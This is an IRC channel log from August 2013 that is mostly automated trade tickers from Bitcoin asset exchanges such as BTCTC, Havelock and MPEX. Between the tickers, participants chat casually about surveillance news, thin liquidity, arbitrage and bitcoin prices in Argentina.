[BTCTC] [BTCGARDEN] 42 @ 0.01538 = 0.646 BTC [-] Aug 05 19:15:27 [BTCTC] [BTCGARDEN] 15 @ 0.01536 = 0.2304 BTC [-] Aug 05 19:15:42 [BTCTC] [BTCGARDEN] 23 @ 0.01526 = 0.351 BTC [-] Aug 05 19:16:03 [BTCTC] [BTCGARDEN] 27 @ 0.01526 = 0.412 BTC [-] Aug 05 19:16:06 [BTCTC] [BTCGARDEN] 3 @ 0.01525 = 0.0458 BTC [-] Aug 05 19:17:25 [BTCTC] [ACTIVEMINING] 297 @ 0.006 = 1.782 BTC [+] Aug 05 19:17:38 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0025 = 0.25 BTC [-] Aug 05 19:17:40 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.002326 = 0.1279 BTC [-] Aug 05 19:17:50 [BTCTC] [LABCOIN] 6 @ 0.001565 = 0.0094 BTC [-] Aug 05 19:17:50 [BTCTC] [LABCOIN] 6 @ 0.001574 = 0.0094 BTC [+] Aug 05 19:17:52 [BTCTC] [LABCOIN] 1 @ 0.001588 BTC [+] Aug 05 19:17:53 [BTCTC] [LABCOIN] 1 @ 0.001602 BTC [+] Aug 05 19:17:54 [BTCTC] [LABCOIN] 6 @ 0.001606 = 0.0096 BTC [+] Aug 05 19:17:55 [BTCTC] [LABCOIN] 1 @ 0.001622 BTC [+] Aug 05 19:18:49 [BTCTC] [BTCGARDEN] 20 @ 0.01526 = 0.3052 BTC [+] Aug 05 19:18:50 [BTCTC] [BTCGARDEN] 10 @ 0.01525 = 0.1525 BTC [-] Aug 05 19:20:01 https://bitcointalk.org/index.php?topic=254930.msg2871583#msg2871583 Aug 05 19:20:06 ActiveMining Overview and Speculation Thread Aug 05 19:21:05 [BTCTC] [ASICMINER-PT] 4 @ 4.15 = 16.6 BTC [+] Aug 05 19:21:06 [BTCTC] [DMS.MINING] 5 @ 0.007289 = 0.0364 BTC [+] Aug 05 19:21:07 [BTCTC] [LABCOIN] 1 @ 0.001566 BTC [-] Aug 05 19:21:14 [BTCTC] [LABCOIN] 10 @ 0.001587 = 0.0159 BTC [+] Aug 05 19:21:14 [BTCTC] [LABCOIN] 4 @ 0.001588 = 0.0064 BTC [+] Aug 05 19:21:15 what the hell lol Aug 05 19:21:20 [MPEX] [S.MPOE] 4729 @ 0.00081476 = 3.853 BTC [-] Aug 05 19:21:22 [MPEX] [S.MPOE] 4871 @ 0.00081354 = 3.9628 BTC [-] Aug 05 19:21:44 http://www.theverge.com/2013/8/5/4590452/dea-nsa-surveillance-cover-up Aug 05 19:21:46 [BTCTC] [BTCGARDEN] 60 @ 0.01525 = 0.915 BTC [-] Aug 05 19:21:46 DEA reportedly covering up the use of NSA surveillance data to prosecute Americans | The Verge Aug 05 19:22:01 ThickAsThieves: read that this morning when will the madness end!? Aug 05 19:22:03 It was only a matter of time for that Aug 05 19:22:10 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [+] Aug 05 19:22:13 [BTCTC] [LABCOIN] 1 @ 0.001588 BTC [+] Aug 05 19:23:11 [BTCTC] [LABCOIN] 1 @ 0.001588 BTC [+] Aug 05 19:23:22 [BTCTC] [LABCOIN] 1 @ 0.001596 BTC [+] Aug 05 19:23:56 the madness doesnt end Aug 05 19:23:59 it just changes Aug 05 19:24:13 Bet you something will happen today Aug 05 19:24:23 and they'll use it as a reason to keep NSA going Aug 05 19:24:54 you mean like closing a bunch of US embassy locations? Aug 05 19:25:05 for a mysterious terror threat Aug 05 19:25:30 [BTCTC] [LABCOIN] 6 @ 0.001596 = 0.0096 BTC [+] Aug 05 19:25:50 [BTCTC] [TAT.MINIGAME] 5 @ 0.000242 = 0.0012 BTC [+] Aug 05 19:25:53 No like an event actually happening, but the US swarms in and saves the day Aug 05 19:26:07 and they will say, we wouldnt of been able to act so quickly without the help of the nsa Aug 05 19:26:40 But yes in addition to the closing Aug 05 19:26:46 basically a false flag Aug 05 19:26:54 [BTCTC] [BMF] 1 @ 0.0447 BTC [+] Aug 05 19:27:29 [BTCTC] [BTCGARDEN] 100 @ 0.01526 = 1.526 BTC [+] Aug 05 19:27:30 [BTCTC] [BTCGARDEN] 10 @ 0.01525 = 0.1525 BTC [-] Aug 05 19:28:10 US embassies closed for mysterious terror threat? cool my shit talking on skype has worked! Aug 05 19:28:12 It's funny how they actually never stop terrorists. I mean, if it happened, it would be all over the news Aug 05 19:28:57 …even though terrorism is such a small threat already, people are bad at math, so it would be good PR Aug 05 19:29:06 No joke Aug 05 19:29:17 alqueda wrote a terror-bot that makes random but realistic sounding threats on various targets transmitted through skype and email Aug 05 19:29:24 [HAVELOCK] [XBOND] 2000 @ 0.0010499 = 2.0998 BTC [+] Aug 05 19:29:29 So what's the alert level now? Purple? Aug 05 19:29:31 alquda 1, nato 0 Aug 05 19:29:43 perpetual orange Aug 05 19:30:00 It means fucking nothing Aug 05 19:30:03 remain seated please Aug 05 19:30:26 [HAVELOCK] [AM100] 20 @ 0.03991 = 0.7982 BTC [-] Aug 05 19:30:35 [HAVELOCK] [AM100] 30 @ 0.0399 = 1.197 BTC [-] Aug 05 19:30:41 [HAVELOCK] [AM100] 3 @ 0.039 = 0.117 BTC [-] Aug 05 19:30:46 [HAVELOCK] [AM100] 84 @ 0.0389111 = 3.2685 BTC [-] Aug 05 19:31:01 [BTCTC] [LABCOIN] 1 @ 0.001596 BTC [+] Aug 05 19:31:02 [BTCTC] [LABCOIN] 14 @ 0.001604 = 0.0225 BTC [+] Aug 05 19:31:04 [BTCTC] [LABCOIN] 1 @ 0.001622 BTC [+] Aug 05 19:31:05 [BTCTC] [LABCOIN] 231 @ 0.00164 = 0.3788 BTC [+] Aug 05 19:31:31 [BTCTC] [DMS.MINING] 4 @ 0.007298 = 0.0292 BTC [+] Aug 05 19:31:36 Yeah Aug 05 19:31:42 Anyways the whole thing is a complete joke Aug 05 19:31:49 [BTCTC] [LABCOIN] 5 @ 0.00164 = 0.0082 BTC [+] Aug 05 19:32:06 [BTCTC] [LABCOIN] 200 @ 0.00164 = 0.328 BTC [+] Aug 05 19:32:26 http://www.simplepenart.com/73 Aug 05 19:32:28 Global Sarcasm Alert Level - Simple Pen Art Aug 05 19:34:08 [BTCTC] [TAT.ASICMINER] 4 @ 0.03994 = 0.1598 BTC [-] Aug 05 19:34:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.03996 = 0.2398 BTC [+] Aug 05 19:34:11 [BTCTC] [TAT.ASICMINER] 15 @ 0.03999 = 0.5999 BTC [+] Aug 05 19:36:31 [HAVELOCK] [SMG] 25 @ 0.0002355 = 0.0059 BTC [-] Aug 05 19:36:52 [BTCTC] [DMS.SELLING] 10 @ 0.02153 = 0.2153 BTC [-] Aug 05 19:37:23 [BTCTC] [BTCGARDEN] 1 @ 0.01548 BTC [+] Aug 05 19:38:55 [BTCTC] [DMS.MINING] 57 @ 0.006701 = 0.382 BTC [-] Aug 05 19:38:56 [BTCTC] [DMS.MINING] 326 @ 0.0067 = 2.1842 BTC [-] Aug 05 19:39:09 [BTCTC] [B.YABMC] 5 @ 0.002893 = 0.0145 BTC [+] Aug 05 19:39:53 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00262 = 0.0105 BTC [+] Aug 05 19:39:59 [BTCTC] [DMS.SELLING] 110 @ 0.02153 = 2.3683 BTC [-] Aug 05 19:40:00 [BTCTC] [BTCGARDEN] 1 @ 0.01526 BTC [-] Aug 05 19:40:02 [BTCTC] [BTCGARDEN] 99 @ 0.01525 = 1.5098 BTC [-] Aug 05 19:40:42 [BTCTC] [DMS.SELLING] 9 @ 0.02153 = 0.1938 BTC [-] Aug 05 19:41:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00262 BTC [+] Aug 05 19:41:47 [HAVELOCK] [XBOND] 93 @ 0.001049 = 0.0976 BTC [-] Aug 05 19:41:56 [BTCTC] [TAT.VIRTUALMINE] 33 @ 0.002326 = 0.0768 BTC [-] Aug 05 19:41:58 [BTCTC] [TAT.VIRTUALMINE] 67 @ 0.002325 = 0.1558 BTC [-] Aug 05 19:42:00 [BTCTC] [ACTIVEMINING] 10 @ 0.00605 = 0.0605 BTC [+] Aug 05 19:42:58 [BTCTC] [LABCOIN] 4 @ 0.001602 = 0.0064 BTC [-] Aug 05 19:45:14 [MPEX] [S.MPOE] 5150 @ 0.00081354 = 4.1897 BTC [-] Aug 05 19:46:34 [BTCTC] [LABCOIN] 10 @ 0.0016 = 0.016 BTC [-] Aug 05 19:46:35 [BTCTC] [LABCOIN] 3000 @ 0.00159 = 4.77 BTC [-] Aug 05 19:46:36 [BTCTC] [LABCOIN] 3000 @ 0.001589 = 4.767 BTC [-] Aug 05 19:46:37 [BTCTC] [LABCOIN] 1 @ 0.001589 BTC [-] Aug 05 19:46:38 [BTCTC] [LABCOIN] 5801 @ 0.001588 = 9.212 BTC [-] Aug 05 19:46:49 [BTCTC] [BTCGARDEN] 7 @ 0.01552 = 0.1086 BTC [+] Aug 05 19:49:06 [BTCTC] [DMS.SELLING] 1000 @ 0.02153 = 21.53 BTC [-] Aug 05 19:54:28 [BTCTC] [BTCGARDEN] 50 @ 0.01525 = 0.7625 BTC [-] Aug 05 19:55:23 [BTCTC] [LABCOIN] 1 @ 0.001607 BTC [+] Aug 05 19:56:28 when the bitcoin value goes up does the btct assets values go down as people sell to go profit on the commidity equity? Aug 05 19:56:37 [HAVELOCK] [AM100] 1 @ 0.04034 BTC [+] Aug 05 19:57:10 [HAVELOCK] [LABCO] 7 @ 0.0019 = 0.0133 BTC [-] Aug 05 19:57:33 there are various theories but I'm not particularly convinced of many of them Aug 05 19:58:14 I guess some people will want to cash out, but is it significant enough? Aug 05 19:58:28 IF your revenue stream is in BTC Aug 05 19:58:35 the asset should be more appealing as the costs are in USD Aug 05 19:58:38 and therefore less Aug 05 19:59:03 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.002614 = 0.0209 BTC [+] Aug 05 19:59:12 catbug Aug 05 19:59:30 :D wrong window, sry Aug 05 20:00:09 [BTCTC] [DMS.SELLING] 202 @ 0.02153 = 4.3491 BTC [-] Aug 05 20:00:44 [BTCTC] [LABCOIN] 1 @ 0.001608 BTC [+] Aug 05 20:00:45 [BTCTC] [LABCOIN] 12 @ 0.001622 = 0.0195 BTC [+] Aug 05 20:00:47 [BTCTC] [LABCOIN] 3 @ 0.001639 = 0.0049 BTC [+] Aug 05 20:00:47 [BTCTC] [LABCOIN] 219 @ 0.001639 = 0.3589 BTC [+] Aug 05 20:00:48 [BTCTC] [LABCOIN] 2765 @ 0.00164 = 4.5346 BTC [+] Aug 05 20:02:40 [BTCTC] [DMS.SELLING] 36 @ 0.02154 = 0.7754 BTC [+] Aug 05 20:04:23 i think the only definite thing is that when the price moves, everything moves a little Aug 05 20:04:29 that can be up OR down Aug 05 20:04:56 the issue being that liquidity is so thin, most assets show wear no matter what Aug 05 20:05:16 [BTCTC] [LABCOIN] 50 @ 0.001608 = 0.0804 BTC [-] Aug 05 20:05:17 [BTCTC] [LABCOIN] 2 @ 0.001607 = 0.0032 BTC [-] Aug 05 20:05:50 [HAVELOCK] [XBOND] 2 @ 0.001049 = 0.0021 BTC [-] Aug 05 20:05:58 [BTCTC] [LABCOIN] 4 @ 0.001602 = 0.0064 BTC [-] Aug 05 20:06:06 The lack of liquidity in these assets is worrisome Aug 05 20:06:29 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [+] Aug 05 20:07:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.03999 = 0.5999 BTC [+] Aug 05 20:07:16 too many shit assets spreading the money around Aug 05 20:07:37 and same assets on many exchanges ;) Aug 05 20:07:46 [BTCTC] [ACTIVEMINING] 1 @ 0.006001 BTC [-] Aug 05 20:07:48 [BTCTC] [ACTIVEMINING] 1 @ 0.006 BTC [-] Aug 05 20:07:49 too many investors with pocket change Aug 05 20:08:20 pankkake, AM having a bunch of PTs is the least of the problems Aug 05 20:08:26 [BTCTC] [LABCOIN] 50 @ 0.001611 = 0.0806 BTC [+] Aug 05 20:08:30 I'm teasing you Aug 05 20:08:31 at least AM is actively arb'd Aug 05 20:08:50 and that leads to a deeper problem Aug 05 20:08:53 am100 on havelock was really low compared to others this week though Aug 05 20:09:00 why are so few people using BF, and HL Aug 05 20:09:15 The Diff betweent ACTM on bf and BTCT is shocking at times Aug 05 20:09:23 BF really doesn't inspire me confidence Aug 05 20:09:26 And theres no reason for that arb to close Aug 05 20:09:32 [BTCTC] [LABCOIN] 1 @ 0.001608 BTC [-] Aug 05 20:09:54 matuszed, if there was even 1 large shareholder of ActM, wouldnt he arb it even? Aug 05 20:10:37 [BTCTC] [LABCOIN] 50 @ 0.00159 = 0.0795 BTC [-] Aug 05 20:10:39 [BTCTC] [LABCOIN] 167 @ 0.00159 = 0.2655 BTC [-] Aug 05 20:10:40 [BTCTC] [LABCOIN] 115 @ 0.001589 = 0.1827 BTC [-] Aug 05 20:12:44 I invested in MININGCO.ETF, the spread is crazy Aug 05 20:13:14 it's not all bad though, given I highly profit from it for now :p Aug 05 20:13:22 but there is like a sale per week Aug 05 20:14:03 [BTCTC] [LABCOIN] 198 @ 0.001588 = 0.3144 BTC [-] Aug 05 20:17:45 [BTCTC] [BTCGARDEN] 1 @ 0.01543 BTC [+] Aug 05 20:18:11 [BTCTC] [BTCGARDEN] 12 @ 0.01544 = 0.1853 BTC [+] Aug 05 20:18:20 http://www.ems-asbestos.co.uk/asbestos-in-fake-snow-wizard-of-oz-1939/?doing_wp_cron=1375716741.1383259296417236328125 Aug 05 20:18:23 Asbestos in fake snow - Wizard of Oz 1939 - Environmental Management Solutions Aug 05 20:18:31 Fun stuff Aug 05 20:19:25 [BTCTC] [BTCGARDEN] 7 @ 0.01526 = 0.1068 BTC [-] Aug 05 20:19:27 [BTCTC] [BTCGARDEN] 33 @ 0.01525 = 0.5033 BTC [-] Aug 05 20:20:12 [BTCTC] [ACTIVEMINING] 148 @ 0.006 = 0.888 BTC [-] Aug 05 20:20:14 [BTCTC] [ACTIVEMINING] 910 @ 0.006001 = 5.4609 BTC [+] Aug 05 20:20:15 [BTCTC] [ACTIVEMINING] 290 @ 0.00605 = 1.7545 BTC [+] Aug 05 20:20:16 [BTCTC] [ACTIVEMINING] 1000 @ 0.006075 = 6.075 BTC [+] Aug 05 20:20:16 [BTCTC] [ACTIVEMINING] 547 @ 0.0061 = 3.3367 BTC [+] Aug 05 20:20:18 [BTCTC] [ACTIVEMINING] 122 @ 0.006121 = 0.7468 BTC [+] Aug 05 20:20:18 [BTCTC] [ACTIVEMINING] 300 @ 0.006199 = 1.8597 BTC [+] Aug 05 20:20:19 [BTCTC] [ACTIVEMINING] 297 @ 0.0062 = 1.8414 BTC [+] Aug 05 20:20:21 [BTCTC] [ACTIVEMINING] 243 @ 0.006212 = 1.5095 BTC [+] Aug 05 20:20:22 woooo. Aug 05 20:20:22 [BTCTC] [ACTIVEMINING] 50 @ 0.006213 = 0.3107 BTC [+] Aug 05 20:20:23 [BTCTC] [ACTIVEMINING] 102 @ 0.006215 = 0.6339 BTC [+] Aug 05 20:20:24 [BTCTC] [ACTIVEMINING] 700 @ 0.00622 = 4.354 BTC [+] Aug 05 20:20:25 come on ActM. Aug 05 20:20:25 [BTCTC] [ACTIVEMINING] 100 @ 0.006275 = 0.6275 BTC [+] Aug 05 20:20:31 [BTCTC] [ACTIVEMINING] 400 @ 0.00628 = 2.512 BTC [+] Aug 05 20:20:32 [BTCTC] [ACTIVEMINING] 250 @ 0.006299 = 1.5748 BTC [+] Aug 05 20:20:36 [BTCTC] [ACTIVEMINING] 100 @ 0.0063 = 0.63 BTC [+] Aug 05 20:20:37 [BTCTC] [ACTIVEMINING] 241 @ 0.0063 = 1.5183 BTC [+] Aug 05 20:20:46 [BTCTC] [DMS.MINING] 16 @ 0.007298 = 0.1168 BTC [+] Aug 05 20:21:02 [BTCTC] [DMS.MINING] 20 @ 0.007299 = 0.146 BTC [+] Aug 05 20:21:20 [BTCTC] [DMS.MINING] 20 @ 0.0073 = 0.146 BTC [+] Aug 05 20:21:52 [BTCTC] [DMS.MINING] 23 @ 0.007391 = 0.17 BTC [+] Aug 05 20:22:06 [BTCTC] [DMS.SELLING] 10 @ 0.02155 = 0.2155 BTC [+] Aug 05 20:22:07 [BTCTC] [DMS.SELLING] 154 @ 0.02159 = 3.3249 BTC [+] Aug 05 20:22:08 hmm Aug 05 20:22:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0394 BTC [-] Aug 05 20:22:15 [BTCTC] [TAT.ASICMINER] 50 @ 0.0394 = 1.97 BTC [-] Aug 05 20:22:30 [BTCTC] [DMS.MINING] 6 @ 0.007393 = 0.0444 BTC [+] Aug 05 20:23:06 [BTCTC] [TAT.ASICMINER] 37 @ 0.03936 = 1.4563 BTC [-] Aug 05 20:23:08 [BTCTC] [TAT.ASICMINER] 50 @ 0.03935 = 1.9675 BTC [-] Aug 05 20:24:25 [BTCTC] [ACTIVEMINING] 1 @ 0.006031 BTC [-] Aug 05 20:25:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.03935 = 0.3542 BTC [-] Aug 05 20:25:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03934 BTC [-] Aug 05 20:25:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.03934 = 0.0787 BTC [-] Aug 05 20:25:30 [BTCTC] [TAT.ASICMINER] 20 @ 0.03932 = 0.7864 BTC [-] Aug 05 20:25:31 [BTCTC] [TAT.ASICMINER] 5 @ 0.03927 = 0.1964 BTC [-] Aug 05 20:25:33 [BTCTC] [TAT.ASICMINER] 25 @ 0.03917 = 0.9793 BTC [-] Aug 05 20:27:29 [BTCTC] [CB.IDIFF-O] 1 @ 0.009125 BTC [+] Aug 05 20:28:57 [BTCTC] [BASIC-MINING] 2 @ 0.4298 = 0.8596 BTC [+] Aug 05 20:28:58 [BTCTC] [BASIC-MINING] 3 @ 0.4299 = 1.2897 BTC [+] Aug 05 20:30:26 [HAVELOCK] [AM100] 4 @ 0.04034 = 0.1614 BTC [+] Aug 05 20:31:56 [BTCTC] [TAT.ASICMINER] 37 @ 0.03992 = 1.477 BTC [+] Aug 05 20:32:41 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002612 BTC [-] **** BEGIN LOGGING AT Tue Aug 6 11:55:10 2013 Aug 06 11:55:16 [BTCTC] [LABCOIN] 3500 @ 0.00162 = 5.67 BTC [-] Aug 06 11:55:24 -NickServ- You failed to identify in time for the nickname mircea_popescu Aug 06 11:56:30 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [-] Aug 06 11:58:05 [BTCTC] [DMS.PURCHASE] 2 @ 0.02827 = 0.0565 BTC [+] Aug 06 12:00:33 [MPEX] [S.MPOE] 16579 @ 0.00082783 = 13.7246 BTC [+] Aug 06 12:01:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.04066 = 0.2846 BTC [+] Aug 06 12:03:06 [BTCTC] [BTCGARDEN] 6 @ 0.016 = 0.096 BTC [-] Aug 06 12:04:05 [BTCTC] [DMS.PURCHASE] 3 @ 0.02827 = 0.0848 BTC [+] Aug 06 12:05:13 [HAVELOCK] [XBOND] 5 @ 0.0010469 = 0.0052 BTC [+] Aug 06 12:10:02 [BTCTC] [LABCOIN] 1 @ 0.001564 BTC [-] Aug 06 12:13:29 would it be a good idea to dump my asicminer-pt and buy tat.asicminer isntead Aug 06 12:13:47 they're pretty ismilar neh ? Aug 06 12:13:59 it seems like tat. is performing better Aug 06 12:14:12 no clue why Aug 06 12:14:54 noise. Aug 06 12:17:01 what happens to a stock price right before a dividend is paid? Aug 06 12:17:09 i assume after its paid it goes down Aug 06 12:17:57 so far they've mostl;y been going up Aug 06 12:18:19 which is counterintuitive. perhaps people are all relieved that the whole thing didn't collapse. Aug 06 12:19:57 [BTCTC] [LABCOIN] 1 @ 0.001559 BTC [-] Aug 06 12:20:21 [HAVELOCK] [AM100] 1 @ 0.0380001 BTC [-] Aug 06 12:20:21 argentina is keeping bitcoin alive Aug 06 12:21:02 i need to get out there and setup a black market for it Aug 06 12:21:23 and list my illegal exchange on btct for venture capital heh Aug 06 12:22:02 ... Aug 06 12:22:32 is gold price higher when paying in argentine pesos? i'd sell btc for peso at a lower rate than the $168/coin they are paying now, then convert the peso to gold to be sold on the american exchange Aug 06 12:23:31 http://www.coindesk.com/why-bitcoins-are-60-more-expensive-in-argentina-than-the-us/ Aug 06 12:23:34 Why bitcoins are 60% more expensive in Argentina than the US Aug 06 12:24:04 coindesk ppl are clueless. Aug 06 12:24:18 it costs about that much to get hard currency out of the country. simple as that. Aug 06 12:24:22 inflation has nothing to do with it Aug 06 12:24:41 good news coming out of uruguay too Aug 06 12:27:51 [BTCTC] [BTCGARDEN] 1 @ 0.01607 BTC [+] Aug 06 12:28:00 [BTCTC] [DMS.SELLING] 30 @ 0.02398 = 0.7194 BTC [-] Aug 06 12:28:52 [BTCTC] [ACTIVEMINING] 10 @ 0.0062 = 0.062 BTC [+] Aug 06 12:29:16 [BTCTC] [DMS.SELLING] 40 @ 0.02399 = 0.9596 BTC [+] Aug 06 12:29:46 [BTCTC] [LABCOIN] 1 @ 0.001565 BTC [+] Aug 06 12:29:53 [BTCTC] [COGNITIVE] 1 @ 0.4052 BTC [-] Aug 06 12:29:55 [BTCTC] [COGNITIVE] 3 @ 0.4051 = 1.2153 BTC [-] Aug 06 12:29:56 [BTCTC] [COGNITIVE] 1 @ 0.405 BTC [-] Aug 06 12:29:57 [BTCTC] [COGNITIVE] 5 @ 0.401 = 2.005 BTC [-] Aug 06 12:29:59 [BTCTC] [COGNITIVE] 4 @ 0.4001 = 1.6004 BTC [-] Aug 06 12:30:00 [BTCTC] [COGNITIVE] 6 @ 0.4 = 2.4 BTC [-] Aug 06 12:30:08 [BTCTC] [LABCOIN] 1 @ 0.001619 BTC [+] Aug 06 12:31:10 [BTCTC] [LABCOIN] 10 @ 0.001619 = 0.0162 BTC [+] Aug 06 12:32:24 [BTCTC] [ACTIVEMINING] 400 @ 0.0062 = 2.48 BTC [+] Aug 06 12:32:25 [BTCTC] [ACTIVEMINING] 420 @ 0.0062 = 2.604 BTC [+] Aug 06 12:32:27 [BTCTC] [ACTIVEMINING] 178 @ 0.0062 = 1.1036 BTC [+] Aug 06 12:34:49 [BTCTC] [ASICMINER-PT] 1 @ 4.03 BTC [+] Aug 06 12:36:16 [BTCTC] [ACTIVEMINING] 3 @ 0.00625 = 0.0188 BTC [+] Aug 06 12:36:32 [BTCTC] [COGNITIVE] 9 @ 0.4 = 3.6 BTC [-] Aug 06 12:36:55 oh i see Aug 06 12:37:01 [BTCTC] [TAT.ASICMINER] 3 @ 0.04056 = 0.1217 BTC [-] Aug 06 12:37:22 [BTCTC] [DMS.SELLING] 346 @ 0.02398 = 8.2971 BTC [-] Aug 06 12:37:45 [BTCTC] [DMS.PURCHASE] 26 @ 0.02827 = 0.735 BTC [+] Aug 06 12:39:19 [BTCTC] [BASIC-MINING] 2 @ 0.429 = 0.858 BTC [-] Aug 06 12:40:24 [BTCTC] [TAT.ASICMINER] 7 @ 0.04056 = 0.2839 BTC [-] Aug 06 12:41:05 [BTCTC] [BASIC-MINING] 1 @ 0.4298 BTC [+] Aug 06 12:42:03 [MPEX] [S.MPOE] 3597 @ 0.00082783 = 2.9777 BTC [+] Aug 06 12:42:10 [MPEX] [S.MPOE] 11413 @ 0.00082822 = 9.4525 BTC [+] Aug 06 12:42:28 [BTCTC] [TAT.ASICMINER] 5 @ 0.04056 = 0.2028 BTC [-] Aug 06 12:43:11 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002609 = 0.0052 BTC [-] Aug 06 12:43:26 [BTCTC] [ASICMINER-PT] 4 @ 4 = 16 BTC [-] Aug 06 12:46:50 [BTCTC] [ASICMINER-PT] 4 @ 4 = 16 BTC [-] Aug 06 12:47:32 [BTCTC] [ACTIVEMINING] 1 @ 0.0062 BTC [-] Aug 06 12:48:06 [BTCTC] [ACTIVEMINING] 197 @ 0.00625 = 1.2313 BTC [+] Aug 06 12:50:59 [BTCTC] [TAT.ASICMINER] 35 @ 0.04005 = 1.4018 BTC [-] Aug 06 12:53:36 [BTCTC] [BTCGARDEN] 43 @ 0.01607 = 0.691 BTC [+] Aug 06 12:55:48 [BTCTC] [DMS.MINING] 1 @ 0.006811 BTC [-] Aug 06 12:55:55 [BTCTC] [DMS.SELLING] 1 @ 0.0224 BTC [-] Aug 06 12:56:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.02827 BTC [+] Aug 06 12:57:29 [BTCTC] [DMS.PURCHASE] 4 @ 0.02827 = 0.1131 BTC [+] Aug 06 12:57:56 [BTCTC] [DMS.MINING] 1 @ 0.006811 BTC [-] Aug 06 12:58:09 [BTCTC] [DMS.SELLING] 1 @ 0.0224 BTC [-] Aug 06 12:58:44 [BTCTC] [DMS.PURCHASE] 1 @ 0.02827 BTC [+] Aug 06 13:01:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04108 BTC [+] Aug 06 13:02:05 [BTCTC] [LABCOIN] 20 @ 0.001619 = 0.0324 BTC [+] Aug 06 13:04:08 [BTCTC] [LABCOIN] 1 @ 0.00162 BTC [+] Aug 06 13:04:09 [BTCTC] [LABCOIN] 4 @ 0.001621 = 0.0065 BTC [+] Aug 06 13:04:18 [BTCTC] [LABCOIN] 15 @ 0.001619 = 0.0243 BTC [-] Aug 06 13:06:14 [BTCTC] [LABCOIN] 54 @ 0.001619 = 0.0874 BTC [-] Aug 06 13:09:12 [MPEX] [S.MPOE] 3687 @ 0.00082822 = 3.0536 BTC [+] Aug 06 13:09:19 [MPEX] [S.MPOE] 10013 @ 0.00082841 = 8.2949 BTC [+] Aug 06 13:15:21 [BTCTC] [ASICMINER-PT] 5 @ 4.01 = 20.05 BTC [+] Aug 06 13:15:22 [BTCTC] [ASICMINER-PT] 17 @ 4 = 68 BTC [-] Aug 06 13:15:24 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 06 13:16:20 [BTCTC] [ACTIVEMINING] 998 @ 0.00625 = 6.2375 BTC [+] Aug 06 13:18:54 [BTCTC] [TAT.ASICMINER] 22 @ 0.04105 = 0.9031 BTC [-] Aug 06 13:20:32 [BTCTC] [RSM] 50 @ 0.012 = 0.6 BTC [-] Aug 06 13:23:44 [BTCTC] [DMS.MINING] 20 @ 0.006821 = 0.1364 BTC [+] Aug 06 13:24:10 [BTCTC] [DMS.MINING] 36 @ 0.00682 = 0.2455 BTC [-] Aug 06 13:25:24 [BTCTC] [DMS.SELLING] 163 @ 0.0224 = 3.6512 BTC [-] **** BEGIN LOGGING AT Tue Aug 6 13:36:59 2013 Aug 06 13:37:22 [BTCTC] [DMS.PURCHASE] 1000 @ 0.02827 = 28.27 BTC [+] Aug 06 13:39:43 [BTCTC] [DMS.MINING] 4 @ 0.006742 = 0.027 BTC [-] Aug 06 13:39:45 [BTCTC] [DMS.MINING] 2 @ 0.00673 = 0.0135 BTC [-] Aug 06 13:39:46 [BTCTC] [DMS.MINING] 8 @ 0.006725 = 0.0538 BTC [-] Aug 06 13:39:51 [BTCTC] [DMS.SELLING] 14 @ 0.0218 = 0.3052 BTC [-] Aug 06 13:40:31 [BTCTC] [DMS.PURCHASE] 14 @ 0.02827 = 0.3958 BTC [+] Aug 06 13:40:45 [BTCTC] [LABCOIN] 14 @ 0.00162 = 0.0227 BTC [+] Aug 06 13:44:54 [BTCTC] [DMS.MINING] 20 @ 0.006704 = 0.1341 BTC [-] Aug 06 13:45:04 [BTCTC] [DMS.SELLING] 20 @ 0.0218 = 0.436 BTC [-] Aug 06 13:45:40 [BTCTC] [DMS.PURCHASE] 20 @ 0.02827 = 0.5654 BTC [+] Aug 06 13:47:48 [BTCTC] [DMS.SELLING] 17 @ 0.0218 = 0.3706 BTC [-] Aug 06 13:47:57 [BTCTC] [DMS.MINING] 17 @ 0.006704 = 0.114 BTC [-] Aug 06 13:48:26 [BTCTC] [DMS.PURCHASE] 17 @ 0.02827 = 0.4806 BTC [+] Aug 06 13:50:05 [BTCTC] [LABCOIN] 235 @ 0.001583 = 0.372 BTC [-] Aug 06 13:50:07 [BTCTC] [LABCOIN] 100 @ 0.001582 = 0.1582 BTC [-] Aug 06 13:50:08 [BTCTC] [LABCOIN] 4 @ 0.001581 = 0.0063 BTC [-] Aug 06 13:50:09 [BTCTC] [LABCOIN] 49 @ 0.001576 = 0.0772 BTC [-] Aug 06 13:50:10 [BTCTC] [LABCOIN] 200 @ 0.001575 = 0.315 BTC [-] Aug 06 13:50:12 [BTCTC] [LABCOIN] 33 @ 0.001574 = 0.0519 BTC [-] Aug 06 13:50:13 [BTCTC] [LABCOIN] 100 @ 0.001573 = 0.1573 BTC [-] Aug 06 13:50:13 [BTCTC] [LABCOIN] 166 @ 0.001572 = 0.261 BTC [-] Aug 06 13:50:14 [BTCTC] [LABCOIN] 37 @ 0.001563 = 0.0578 BTC [-] Aug 06 13:55:10 [BTCTC] [DMS.PURCHASE] 160 @ 0.02827 = 4.5232 BTC [+] Aug 06 13:56:37 [BTCTC] [TAT.MINIGAME] 1 @ 0.000242 BTC [+] Aug 06 13:58:39 [BTCTC] [ASICMINER-PT] 1 @ 4.028 BTC [+] Aug 06 13:58:59 [BTCTC] [LABCOIN] 55 @ 0.001576 = 0.0867 BTC [+] Aug 06 13:59:01 [BTCTC] [LABCOIN] 79 @ 0.001572 = 0.1242 BTC [-] Aug 06 14:02:12 [BTCTC] [BITVPS] 100 @ 0.0022 = 0.22 BTC [-] Aug 06 14:02:15 [BTCTC] [BITVPS] 100 @ 0.0021 = 0.21 BTC [-] Aug 06 14:02:16 [BTCTC] 